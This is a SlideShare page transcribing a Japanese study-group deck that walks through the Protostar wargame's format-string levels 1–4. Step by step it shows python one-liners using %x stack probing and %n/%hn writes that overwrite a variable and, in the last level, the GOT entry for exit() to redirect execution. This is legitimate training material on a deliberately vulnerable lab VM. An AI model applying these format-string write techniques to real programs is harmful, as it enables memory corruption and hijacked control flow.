SlideShare a Scribd company logo

Tachikoma 2013-01

Ryota Hanyu
Ryota Hanyu
1 of 42
Download to read offline
Tachikoma January Monday, January 28, 13
おしながき • Fusion lv.02, 03, 04 • 5 minutes python Monday, January 28, 13
Monday, January 28, 13
WTF!? Monday, January 28, 13
おしながき • Fusion lv.02, 03, 04 • 5 minutes python Monday, January 28, 13
おしながき • Protostar format lv.01, 02, 03, 04 • 5 minutes python Monday, January 28, 13
おしながき • Protostar format lv.01, 02, 03, 04 • 多めにやるから許してください… • 5 minutes python • import “大学の課題” Monday, January 28, 13
Protostar format 1 Monday, January 28, 13
Protostar format 1 • int targetを書き換えればok • C言語だとグローバル変数は0で初期化 • 目標:なんでもいいから0以外にする Monday, January 28, 13
Protostar format 1 • argv[1] を色々変えてあげればいいっぽい • どのへんまでpopすると出てくるか探す • int だから4byte • AAAA%x.... • 手でやっても見つからない… Monday, January 28, 13
Protostar format 1 Monday, January 28, 13
Protostar format 1 • 132くらい? • printf(“AAAA%132%x”, <-と同じ); • ってなるっぽい? Monday, January 28, 13
Protostar format 1 • %nを使って適当に書き換えよう • ./format1 `python -c 'print "x38x96x04x08xx%132$n"'` • 8xxyou have modified the target :) Monday, January 28, 13
Protostar format 2 Monday, January 28, 13
Protostar format 2 • 変更点 • argvからじゃなくてstdin • targetを64にしないといけないらしい Monday, January 28, 13
Protostar format 2 • 1と同様にpopして探すよ • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2 • AAAA200,b7fd8420,bffff564,41414141 • target is 0 :( • 今度は4つでいいみたい Monday, January 28, 13
Protostar format 2 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target • 080496e4 g O .bss 00000004 target • 1と同じ感じで試してみる • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08%4$n"' | ./format2 • ? • target is 4 :( Monday, January 28, 13
Protostar format 2 • target=4になった! • %nは書き換わった文字数だよね! • 試してみる • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08x%4$n"' | ./format2 • x • target is 5 :( Monday, January 28, 13
Protostar format 2 • もっかい試してみる • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08xx%4$n"' | ./format2 • xx • target is 6 :( • 64-4=60 だし… • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08"+ "x"*60 +"%4$n"' | ./format2 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx • you have modified the target :) Monday, January 28, 13
Protostar format 3 Monday, January 28, 13
Protostar format 3 • 変更点 • 直にprintf()じゃなくてprintbuffer(char *)をカマせてる • たくさん書き換えないといけない Monday, January 28, 13
Protostar format 3 • とりあえず同じようにしてみる • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3 • AAAAxx0,bffff520,b7fd7ff4,0 • target is 00000000 :( Monday, January 28, 13
Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( Monday, January 28, 13
Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( Monday, January 28, 13
Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( • 12個目でした Monday, January 28, 13
Protostar format 3 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target • 080496f4 g O .bss 00000004 target Monday, January 28, 13
Protostar format 3 • 試してみる • python -c 'print "xf4x96x04x08" + "x"*256 + "%12$n"' | ./format3 • xxxxxxxxxxxxxxxxxxxxx(ry • target is 00000104 :( • 動かない Monday, January 28, 13
Protostar format 3 • マルチバイトや! • 各バイトごとに同じように計算してあげれば! Monday, January 28, 13
• 試してみる • python -c 'print "xf4x96x04x08xf5x96x04x08xf6x96x04x08%12$n %13$n%14$n"' | ./format3 • ? • target is 000c0c0c :( Monday, January 28, 13
• 色々足してみる • python -c 'print "xf4x96x04x08xf5x96x04x08xf6x96x04x08" + "x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n"' | ./format3 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxx(ry • you have modified the target :) Monday, January 28, 13
Protostar format 4 Monday, January 28, 13
Protostar format 4 • 変更点 • targetじゃなくてGOTを書き換える • 目標 • call hello() Monday, January 28, 13
Protostar format 4 • helloのアドレス • # objdump -d ./format4 | grep hello [/opt/protostar/bin] • 080484b4 <hello>: Monday, January 28, 13
Protostar format 4 • pop, pop, pop... • python -c "print 'AAAA' + ',%x'*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 Monday, January 28, 13
Protostar format 4 • pop, pop, pop... • python -c "print 'AAAA' + ',%x'*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 Monday, January 28, 13
Protostar format 4 • pop, pop, pop... • python -c "print 'AAAA' + ',%x'*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 • 4番目でした Monday, January 28, 13
Protostar format 4 • 方向性 • exit()を呼ぼうとしたら、hello()が呼ばれるようにしよう Monday, January 28, 13
Protostar format 4 • objdump -R ./format4 |grep exit • 08049718 R_386_JUMP_SLOT _exit • 08049724 R_386_JUMP_SLOT exit Monday, January 28, 13
Protostar format 4 • 0x08049724をhello()に書き換えればいいから… • python -c 'print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn"' | ./format4 • [1] 4950 done python -c | • 4951 segmentation fault ./format4 • もしかして:入力長すぎ Monday, January 28, 13
Protostar format 4 • Google(“help me”); • %nd(nは任意の整数)ってやると0埋めできるでしょ • 普通はnbyte埋めたいときはこうやるらしい… Monday, January 28, 13
Protostar format 4 • もう一回試す • python -c 'print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn%976d%5$hn" + "x"*132 + "%6$hn"' | ./format4 • $ %'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx(ry • code execution redirected! you win Monday, January 28, 13
Protostar format 4 • なんか動いた。 Monday, January 28, 13

Recommended

TensorFlow 深度學習快速上手班--自然語言處理應用
TensorFlow 深度學習快速上手班--自然語言處理應用TensorFlow 深度學習快速上手班--自然語言處理應用
TensorFlow 深度學習快速上手班--自然語言處理應用Mark Chang
 
Proposals for new function in Java SE 9 and beyond
Proposals for new function in Java SE 9 and beyondProposals for new function in Java SE 9 and beyond
Proposals for new function in Java SE 9 and beyondBarry Feigenbaum
 
Python
PythonPython
Pythonprasad1ncc
 
Python3
Python3Python3
Python3Jiayun Zhou
 
Testing in Python: doctest and unittest
Testing in Python: doctest and unittestTesting in Python: doctest and unittest
Testing in Python: doctest and unittestFariz Darari
 
Testing in Python: doctest and unittest (Updated)
Testing in Python: doctest and unittest (Updated)Testing in Python: doctest and unittest (Updated)
Testing in Python: doctest and unittest (Updated)Fariz Darari
 
EuroPython 2016 - Do I Need To Switch To Golang
EuroPython 2016 - Do I Need To Switch To GolangEuroPython 2016 - Do I Need To Switch To Golang
EuroPython 2016 - Do I Need To Switch To GolangMax Tepkeev
 
Functions, List and String methods
Functions, List and String methodsFunctions, List and String methods
Functions, List and String methodsPranavSB
 

Recommended

TensorFlow 深度學習快速上手班--自然語言處理應用
TensorFlow 深度學習快速上手班--自然語言處理應用TensorFlow 深度學習快速上手班--自然語言處理應用
TensorFlow 深度學習快速上手班--自然語言處理應用Mark Chang
 
Proposals for new function in Java SE 9 and beyond
Proposals for new function in Java SE 9 and beyondProposals for new function in Java SE 9 and beyond
Proposals for new function in Java SE 9 and beyondBarry Feigenbaum
 
Python
PythonPython
Pythonprasad1ncc
 
Python3
Python3Python3
Python3Jiayun Zhou
 
Testing in Python: doctest and unittest
Testing in Python: doctest and unittestTesting in Python: doctest and unittest
Testing in Python: doctest and unittestFariz Darari
 
Testing in Python: doctest and unittest (Updated)
Testing in Python: doctest and unittest (Updated)Testing in Python: doctest and unittest (Updated)
Testing in Python: doctest and unittest (Updated)Fariz Darari
 
EuroPython 2016 - Do I Need To Switch To Golang
EuroPython 2016 - Do I Need To Switch To GolangEuroPython 2016 - Do I Need To Switch To Golang
EuroPython 2016 - Do I Need To Switch To GolangMax Tepkeev
 
Functions, List and String methods
Functions, List and String methodsFunctions, List and String methods
Functions, List and String methodsPranavSB
 
Python Basics
Python BasicsPython Basics
Python Basicstusharpanda88
 
Python for text processing
Python for text processingPython for text processing
Python for text processingXiang Li
 
Python 3000
Python 3000Python 3000
Python 3000Bob Chao
 
Domain Driven Design Made Functional with Python
Domain Driven Design Made Functional with Python Domain Driven Design Made Functional with Python
Domain Driven Design Made Functional with Python Jean Carlo Machado
 
The bones of a nice Python script
The bones of a nice Python scriptThe bones of a nice Python script
The bones of a nice Python scriptsaniac
 
TensorFlow 深度學習快速上手班--機器學習
TensorFlow 深度學習快速上手班--機器學習TensorFlow 深度學習快速上手班--機器學習
TensorFlow 深度學習快速上手班--機器學習Mark Chang
 
AmI 2015 - Python basics
AmI 2015 - Python basicsAmI 2015 - Python basics
AmI 2015 - Python basicsLuigi De Russis
 
Python introduction
Python introductionPython introduction
Python introductionMarcelo Araujo
 
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...Maulik Borsaniya
 
Cara mengubah mindset sampah menjadi emas
Cara mengubah mindset sampah menjadi emasCara mengubah mindset sampah menjadi emas
Cara mengubah mindset sampah menjadi emasgesacantik
 
So and Mi Patterns Level 1
So and Mi Patterns Level 1So and Mi Patterns Level 1
So and Mi Patterns Level 1EmilyJHinz
 
MIND sweeping introduction to PHP
MIND sweeping introduction to PHPMIND sweeping introduction to PHP
MIND sweeping introduction to PHPBUDNET
 
Flight night
Flight nightFlight night
Flight nightEmilyJHinz
 
クラウド過渡期、Identityに注目だ! idit2014
クラウド過渡期、Identityに注目だ! idit2014クラウド過渡期、Identityに注目だ! idit2014
クラウド過渡期、Identityに注目だ! idit2014Egawa Junichi
 
18 zijmr vol2_issue5_may 2012
18 zijmr vol2_issue5_may 201218 zijmr vol2_issue5_may 2012
18 zijmr vol2_issue5_may 2012abhi_sek200
 
Boomwhacker songs
Boomwhacker songsBoomwhacker songs
Boomwhacker songsEmilyJHinz
 
Candy rhythms
Candy rhythmsCandy rhythms
Candy rhythmsEmilyJHinz
 
Kisah nabi muhammad
Kisah nabi muhammadKisah nabi muhammad
Kisah nabi muhammadcahgresik
 
Open id technight10_cis2013_egawa
Open id technight10_cis2013_egawaOpen id technight10_cis2013_egawa
Open id technight10_cis2013_egawaEgawa Junichi
 
Baroque music
Baroque musicBaroque music
Baroque musicEmilyJHinz
 
Teach your kids how to program with Python and the Raspberry Pi
Teach your kids how to program with Python and the Raspberry PiTeach your kids how to program with Python and the Raspberry Pi
Teach your kids how to program with Python and the Raspberry PiJuan Gomez
 
Introduction to Python and Web Programming
Introduction to Python and Web ProgrammingIntroduction to Python and Web Programming
Introduction to Python and Web ProgrammingDavid Neiss
 

More Related Content

What's hot

Python for text processing
Python for text processingPython for text processing
Python for text processingXiang Li
 
Python 3000
Python 3000Python 3000
Python 3000Bob Chao
 
Domain Driven Design Made Functional with Python
Domain Driven Design Made Functional with Python Domain Driven Design Made Functional with Python
Domain Driven Design Made Functional with Python Jean Carlo Machado
 
The bones of a nice Python script
The bones of a nice Python scriptThe bones of a nice Python script
The bones of a nice Python scriptsaniac
 
TensorFlow 深度學習快速上手班--機器學習
TensorFlow 深度學習快速上手班--機器學習TensorFlow 深度學習快速上手班--機器學習
TensorFlow 深度學習快速上手班--機器學習Mark Chang
 
AmI 2015 - Python basics
AmI 2015 - Python basicsAmI 2015 - Python basics
AmI 2015 - Python basicsLuigi De Russis
 
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...Maulik Borsaniya
 

What's hot (9)

Python Basics
Python BasicsPython Basics
Python Basics
 
Python for text processing
Python for text processingPython for text processing
Python for text processing
 
Python 3000
Python 3000Python 3000
Python 3000
 
Domain Driven Design Made Functional with Python
Domain Driven Design Made Functional with Python Domain Driven Design Made Functional with Python
Domain Driven Design Made Functional with Python
 
The bones of a nice Python script
The bones of a nice Python scriptThe bones of a nice Python script
The bones of a nice Python script
 
TensorFlow 深度學習快速上手班--機器學習
TensorFlow 深度學習快速上手班--機器學習TensorFlow 深度學習快速上手班--機器學習
TensorFlow 深度學習快速上手班--機器學習
 
AmI 2015 - Python basics
AmI 2015 - Python basicsAmI 2015 - Python basics
AmI 2015 - Python basics
 
Python introduction
Python introductionPython introduction
Python introduction
 
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
PYTHON -Chapter 2 - Functions, Exception, Modules and Files -MAULIK BOR...
 

Viewers also liked

Cara mengubah mindset sampah menjadi emas
Cara mengubah mindset sampah menjadi emasCara mengubah mindset sampah menjadi emas
Cara mengubah mindset sampah menjadi emasgesacantik
 
So and Mi Patterns Level 1
So and Mi Patterns Level 1So and Mi Patterns Level 1
So and Mi Patterns Level 1EmilyJHinz
 
MIND sweeping introduction to PHP
MIND sweeping introduction to PHPMIND sweeping introduction to PHP
MIND sweeping introduction to PHPBUDNET
 
クラウド過渡期、Identityに注目だ! idit2014
クラウド過渡期、Identityに注目だ! idit2014クラウド過渡期、Identityに注目だ! idit2014
クラウド過渡期、Identityに注目だ! idit2014Egawa Junichi
 
18 zijmr vol2_issue5_may 2012
18 zijmr vol2_issue5_may 201218 zijmr vol2_issue5_may 2012
18 zijmr vol2_issue5_may 2012abhi_sek200
 
Boomwhacker songs
Boomwhacker songsBoomwhacker songs
Boomwhacker songsEmilyJHinz
 
Kisah nabi muhammad
Kisah nabi muhammadKisah nabi muhammad
Kisah nabi muhammadcahgresik
 
Open id technight10_cis2013_egawa
Open id technight10_cis2013_egawaOpen id technight10_cis2013_egawa
Open id technight10_cis2013_egawaEgawa Junichi
 

Viewers also liked (11)

Cara mengubah mindset sampah menjadi emas
Cara mengubah mindset sampah menjadi emasCara mengubah mindset sampah menjadi emas
Cara mengubah mindset sampah menjadi emas
 
So and Mi Patterns Level 1
So and Mi Patterns Level 1So and Mi Patterns Level 1
So and Mi Patterns Level 1
 
MIND sweeping introduction to PHP
MIND sweeping introduction to PHPMIND sweeping introduction to PHP
MIND sweeping introduction to PHP
 
Flight night
Flight nightFlight night
Flight night
 
クラウド過渡期、Identityに注目だ! idit2014
クラウド過渡期、Identityに注目だ! idit2014クラウド過渡期、Identityに注目だ! idit2014
クラウド過渡期、Identityに注目だ! idit2014
 
18 zijmr vol2_issue5_may 2012
18 zijmr vol2_issue5_may 201218 zijmr vol2_issue5_may 2012
18 zijmr vol2_issue5_may 2012
 
Boomwhacker songs
Boomwhacker songsBoomwhacker songs
Boomwhacker songs
 
Candy rhythms
Candy rhythmsCandy rhythms
Candy rhythms
 
Kisah nabi muhammad
Kisah nabi muhammadKisah nabi muhammad
Kisah nabi muhammad
 
Open id technight10_cis2013_egawa
Open id technight10_cis2013_egawaOpen id technight10_cis2013_egawa
Open id technight10_cis2013_egawa
 
Baroque music
Baroque musicBaroque music
Baroque music
 

Similar to Tachikoma 2013-01

Teach your kids how to program with Python and the Raspberry Pi
Teach your kids how to program with Python and the Raspberry PiTeach your kids how to program with Python and the Raspberry Pi
Teach your kids how to program with Python and the Raspberry PiJuan Gomez
 
Introduction to Python and Web Programming
Introduction to Python and Web ProgrammingIntroduction to Python and Web Programming
Introduction to Python and Web ProgrammingDavid Neiss
 
Introduction to Exploratory Data Analysis with the sci-analysis Python Package
Introduction to Exploratory Data Analysis with the sci-analysis Python PackageIntroduction to Exploratory Data Analysis with the sci-analysis Python Package
Introduction to Exploratory Data Analysis with the sci-analysis Python PackageChrisMorrow28
 
Scalable JavaScript
Scalable JavaScriptScalable JavaScript
Scalable JavaScriptYnon Perek
 
StatsD Workshop Monitorama 2013
StatsD Workshop Monitorama 2013StatsD Workshop Monitorama 2013
StatsD Workshop Monitorama 2013Daniel Schauenberg
 
Python入門 : 4日間コース社内トレーニング
Python入門 : 4日間コース社内トレーニングPython入門 : 4日間コース社内トレーニング
Python入門 : 4日間コース社内トレーニングYuichi Ito
 
Value objects in JS - an ES7 work in progress
Value objects in JS - an ES7 work in progressValue objects in JS - an ES7 work in progress
Value objects in JS - an ES7 work in progressBrendan Eich
 
SPL_PS2 (1).ppt
SPL_PS2 (1).pptSPL_PS2 (1).ppt
SPL_PS2 (1).ppttadudemise
 
Robb broome rubyconf x presentation for publication
Robb broome rubyconf x presentation for publicationRobb broome rubyconf x presentation for publication
Robb broome rubyconf x presentation for publicationRobb Broome
 
Mapreduce Algorithms
Mapreduce AlgorithmsMapreduce Algorithms
Mapreduce AlgorithmsAmund Tveit
 
Basic concept of Python.pptx includes design tool, identifier, variables.
Basic concept of Python.pptx includes design tool, identifier, variables.Basic concept of Python.pptx includes design tool, identifier, variables.
Basic concept of Python.pptx includes design tool, identifier, variables.supriyasarkar38
 

Similar to Tachikoma 2013-01 (13)

Teach your kids how to program with Python and the Raspberry Pi
Teach your kids how to program with Python and the Raspberry PiTeach your kids how to program with Python and the Raspberry Pi
Teach your kids how to program with Python and the Raspberry Pi
 
Introduction to Python and Web Programming
Introduction to Python and Web ProgrammingIntroduction to Python and Web Programming
Introduction to Python and Web Programming
 
Introduction to Exploratory Data Analysis with the sci-analysis Python Package
Introduction to Exploratory Data Analysis with the sci-analysis Python PackageIntroduction to Exploratory Data Analysis with the sci-analysis Python Package
Introduction to Exploratory Data Analysis with the sci-analysis Python Package
 
Scalable JavaScript
Scalable JavaScriptScalable JavaScript
Scalable JavaScript
 
StatsD Workshop Monitorama 2013
StatsD Workshop Monitorama 2013StatsD Workshop Monitorama 2013
StatsD Workshop Monitorama 2013
 
Python入門 : 4日間コース社内トレーニング
Python入門 : 4日間コース社内トレーニングPython入門 : 4日間コース社内トレーニング
Python入門 : 4日間コース社内トレーニング
 
Value objects in JS - an ES7 work in progress
Value objects in JS - an ES7 work in progressValue objects in JS - an ES7 work in progress
Value objects in JS - an ES7 work in progress
 
SPL_PS2 (1).ppt
SPL_PS2 (1).pptSPL_PS2 (1).ppt
SPL_PS2 (1).ppt
 
Robb broome rubyconf x presentation for publication
Robb broome rubyconf x presentation for publicationRobb broome rubyconf x presentation for publication
Robb broome rubyconf x presentation for publication
 
Mapreduce Algorithms
Mapreduce AlgorithmsMapreduce Algorithms
Mapreduce Algorithms
 
Gnuplot 2
Gnuplot 2Gnuplot 2
Gnuplot 2
 
python_class.pptx
python_class.pptxpython_class.pptx
python_class.pptx
 
Basic concept of Python.pptx includes design tool, identifier, variables.
Basic concept of Python.pptx includes design tool, identifier, variables.Basic concept of Python.pptx includes design tool, identifier, variables.
Basic concept of Python.pptx includes design tool, identifier, variables.
 

Tachikoma 2013-01

  • 2. おしながき • Fusion lv.02, 03, 04 • 5 minutes python Monday, January 28, 13
  • 5. おしながき • Fusion lv.02, 03, 04 • 5 minutes python Monday, January 28, 13
  • 6. おしながき • Protostar format lv.01, 02, 03, 04 • 5 minutes python Monday, January 28, 13
  • 7. おしながき • Protostar format lv.01, 02, 03, 04 • 多めにやるから許してください… • 5 minutes python • import “大学の課題” Monday, January 28, 13
  • 8. Protostar format 1 Monday, January 28, 13
  • 9. Protostar format 1 • int targetを書き換えればok • C言語だとグローバル変数は0で初期化 • 目標:なんでもいいから0以外にする Monday, January 28, 13
  • 10. Protostar format 1 • argv[1] を色々変えてあげればいいっぽい • どのへんまでpopすると出てくるか探す • int だから4byte • AAAA%x.... • 手でやっても見つからない… Monday, January 28, 13
  • 11. Protostar format 1 Monday, January 28, 13
  • 12. Protostar format 1 • 132くらい? • printf(“AAAA%132%x”, <-と同じ); • ってなるっぽい? Monday, January 28, 13
  • 13. Protostar format 1 • %nを使って適当に書き換えよう • ./format1 `python -c 'print "x38x96x04x08xx%132$n"'` • 8xxyou have modified the target :) Monday, January 28, 13
  • 14. Protostar format 2 Monday, January 28, 13
  • 15. Protostar format 2 • 変更点 • argvからじゃなくてstdin • targetを64にしないといけないらしい Monday, January 28, 13
  • 16. Protostar format 2 • 1と同様にpopして探すよ • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2 • AAAA200,b7fd8420,bffff564,41414141 • target is 0 :( • 今度は4つでいいみたい Monday, January 28, 13
  • 17. Protostar format 2 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target • 080496e4 g O .bss 00000004 target • 1と同じ感じで試してみる • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08%4$n"' | ./format2 • ? • target is 4 :( Monday, January 28, 13
  • 18. Protostar format 2 • target=4になった! • %nは書き換わった文字数だよね! • 試してみる • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08x%4$n"' | ./format2 • x • target is 5 :( Monday, January 28, 13
  • 19. Protostar format 2 • もっかい試してみる • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08xx%4$n"' | ./format2 • xx • target is 6 :( • 64-4=60 だし… • user@protostar:/opt/protostar/bin$ python -c 'print "xe4x96x04x08"+ "x"*60 +"%4$n"' | ./format2 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx • you have modified the target :) Monday, January 28, 13
  • 20. Protostar format 3 Monday, January 28, 13
  • 21. Protostar format 3 • 変更点 • 直にprintf()じゃなくてprintbuffer(char *)をカマせてる • たくさん書き換えないといけない Monday, January 28, 13
  • 22. Protostar format 3 • とりあえず同じようにしてみる • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3 • AAAAxx0,bffff520,b7fd7ff4,0 • target is 00000000 :( Monday, January 28, 13
  • 23. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( Monday, January 28, 13
  • 24. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( Monday, January 28, 13
  • 25. Protostar format 3 • よろしいならばpythonだ • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3 • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252 c7878,78252c78,2c78252c,252c7825 • target is 00000000 :( • 12個目でした Monday, January 28, 13
  • 26. Protostar format 3 • targetのアドレス • user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target • 080496f4 g O .bss 00000004 target Monday, January 28, 13
  • 27. Protostar format 3 • 試してみる • python -c 'print "xf4x96x04x08" + "x"*256 + "%12$n"' | ./format3 • xxxxxxxxxxxxxxxxxxxxx(ry • target is 00000104 :( • 動かない Monday, January 28, 13
  • 28. Protostar format 3 • マルチバイトや! • 各バイトごとに同じように計算してあげれば! Monday, January 28, 13
  • 29. • 試してみる • python -c 'print "xf4x96x04x08xf5x96x04x08xf6x96x04x08%12$n %13$n%14$n"' | ./format3 • ? • target is 000c0c0c :( Monday, January 28, 13
  • 30. • 色々足してみる • python -c 'print "xf4x96x04x08xf5x96x04x08xf6x96x04x08" + "x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n"' | ./format3 • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxx(ry • you have modified the target :) Monday, January 28, 13
  • 31. Protostar format 4 Monday, January 28, 13
  • 32. Protostar format 4 • 変更点 • targetじゃなくてGOTを書き換える • 目標 • call hello() Monday, January 28, 13
  • 33. Protostar format 4 • helloのアドレス • # objdump -d ./format4 | grep hello [/opt/protostar/bin] • 080484b4 <hello>: Monday, January 28, 13
  • 34. Protostar format 4 • pop, pop, pop... • python -c "print 'AAAA' + ',%x'*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 Monday, January 28, 13
  • 35. Protostar format 4 • pop, pop, pop... • python -c "print 'AAAA' + ',%x'*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 Monday, January 28, 13
  • 36. Protostar format 4 • pop, pop, pop... • python -c "print 'AAAA' + ',%x'*4" | ./format4 • AAAA,200,b7fd8420,bffff9c4,41414141 • 4番目でした Monday, January 28, 13
  • 37. Protostar format 4 • 方向性 • exit()を呼ぼうとしたら、hello()が呼ばれるようにしよう Monday, January 28, 13
  • 38. Protostar format 4 • objdump -R ./format4 |grep exit • 08049718 R_386_JUMP_SLOT _exit • 08049724 R_386_JUMP_SLOT exit Monday, January 28, 13
  • 39. Protostar format 4 • 0x08049724をhello()に書き換えればいいから… • python -c 'print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn"' | ./format4 • [1] 4950 done python -c | • 4951 segmentation fault ./format4 • もしかして:入力長すぎ Monday, January 28, 13
  • 40. Protostar format 4 • Google(“help me”); • %nd(nは任意の整数)ってやると0埋めできるでしょ • 普通はnbyte埋めたいときはこうやるらしい… Monday, January 28, 13
  • 41. Protostar format 4 • もう一回試す • python -c 'print "x24x97x04x08x25x97x04x08x27x97x04x08" + "x"*168 + "%4$hn%976d%5$hn" + "x"*132 + "%6$hn"' | ./format4 • $ %'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxx(ry • code execution redirected! you win Monday, January 28, 13
  • 42. Protostar format 4 • なんか動いた。 Monday, January 28, 13